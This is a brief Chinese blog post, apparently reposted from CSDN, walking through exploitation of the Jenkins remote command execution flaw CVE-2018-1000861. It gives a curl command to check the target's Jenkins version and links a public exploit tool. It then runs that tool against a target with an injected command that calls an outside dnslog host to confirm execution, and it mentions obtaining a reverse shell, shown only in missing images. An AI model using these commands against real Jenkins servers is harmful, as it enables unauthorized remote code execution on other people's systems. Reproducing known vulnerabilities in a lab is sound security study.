Jenkins远程命令执行漏洞(CVE-2018-1000861)

漏洞复现

1、查看目标版本。
curl -s -I http://xxx:8080| grep X-Jenkins
在这里插入图片描述
2、利用工具。
https://github.com/orangetw/awesome-jenkins-rce-2019
usage:
python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’
在这里插入图片描述3、成功接收dnslog。
在这里插入图片描述4、反弹shell。
在这里插入图片描述
getshell:
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/lhh134/article/details/106307189